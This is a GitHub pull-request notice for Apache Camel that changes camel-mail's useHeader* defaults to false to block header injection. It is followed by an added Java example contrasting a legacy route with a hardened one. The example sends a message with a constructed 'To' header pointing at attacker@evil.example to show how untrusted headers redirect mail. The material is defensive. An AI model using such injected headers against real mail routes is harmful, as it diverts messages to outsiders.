rpamu-jdev opened a new pull request, #24002: URL: https://github.com/apache/camel/pull/24002
Changes the `useHeaderRecipients`, `useHeaderFrom`, `useHeaderReplyTo`, and `useHeaderSubject` options in `camel-mail` from `defaultValue=true` to `defaultValue=false`.

This is a security hardening change (similar to CAMEL-23522 / CVE-2025-27636). When default=true, untrusted exchange headers could silently override the recipients, sender, subject, or reply-to configured in the endpoint URI, a potential header injection vector. With default=false, the endpoint URI configuration is always used unless the user explicitly opts in by setting the option to true in the URI.

**Changes:**

- `MailConfiguration.java`: set all 4 `useHeader*` options to `defaultValue = "false"` and label `producer,security`
- Updated affected tests to explicitly opt-in with `useHeader*=true` in the URI
- Added breaking change notice and migration guide to `camel-4x-upgrade-guide-4_21.adoc`

**Migration:**

Users who rely on exchange headers overriding mail recipients/sender/subject/reply-to must explicitly add `useHeaderRecipients=true`, `useHeaderFrom=true`, `useHeaderSubject=true`, or `useHeaderReplyTo=true` to their endpoint URI.
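The following Java DSL routes illustrate the precedence problem the PR describes and the opt-in it introduces. This is an added example written for this page, not code from the PR or from the camel-mail component. It assumes the mail producer honours the `To`, `CC`, `BCC`, `From`, `Subject` and `Reply-To` exchange headers, that the `useHeader*` URI options behave as the PR states, and that `smtp.example.com` and the addresses below are placeholders; the header names and the `removeHeaders` pattern are assumptions, not something the PR confirms.

```java
import org.apache.camel.CamelContext;
import org.apache.camel.ProducerTemplate;
import org.apache.camel.builder.RouteBuilder;
import org.apache.camel.impl.DefaultCamelContext;

/**
 * Added illustration of the camel-mail header-precedence hardening.
 * Endpoint host, addresses and header names are placeholders/assumptions.
 */
public class MailHeaderPrecedenceExample extends RouteBuilder {

    // Endpoint the operator intends: every message goes to the ops mailbox.
    private static final String SMTP = "smtp://smtp.example.com"
            + "?from=noreply@example.com&to=ops@example.com&subject=Alert";

    @Override
    public void configure() {
        // Legacy behaviour (old default, now requires explicit opt-in):
        // headers carried on the exchange win over the URI configuration.
        // If the exchange was built from untrusted input (HTTP request,
        // queue message) and still carries a "To" header, the caller
        // chooses the recipient, not the endpoint URI.
        from("direct:mail-legacy")
            .to(SMTP + "&useHeaderRecipients=true&useHeaderFrom=true"
                     + "&useHeaderSubject=true&useHeaderReplyTo=true");

        // Hardened behaviour (new default in the PR): the URI values are
        // used regardless of what the exchange carries. As defence in depth
        // the route also strips the mail-related headers before the
        // producer, so the outcome does not depend on the option defaults
        // of whichever Camel version is deployed. The header pattern is
        // an assumption about the names the mail producer reads.
        from("direct:mail-hardened")
            .removeHeaders("To|CC|BCC|From|Subject|Reply-To")
            .to(SMTP);
    }

    public static void main(String[] args) throws Exception {
        CamelContext ctx = new DefaultCamelContext();
        ctx.addRoutes(new MailHeaderPrecedenceExample());
        ctx.start();
        try {
            ProducerTemplate t = ctx.createProducerTemplate();
            String body = "disk usage at 95%";

            // Constructed attacker-influenced header: a "To" value that
            // arrived with the inbound request and was never cleared.
            // On the legacy route this redirects the alert to the
            // attacker; on the hardened route ops@example.com still
            // receives it.
            t.sendBodyAndHeader("direct:mail-legacy", body,
                    "To", "attacker@evil.example");
            t.sendBodyAndHeader("direct:mail-hardened", body,
                    "To", "attacker@evil.example");
        } finally {
            ctx.stop();
        }
    }
}
```

When upgrading, the safer migration is usually to keep the new default and only set `useHeaderRecipients=true` (or the other `useHeader*` options) on routes where the headers are produced by your own route logic, for example with `setHeader("To", ...)` immediately before the mail endpoint, rather than on routes whose exchanges originate from external input.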
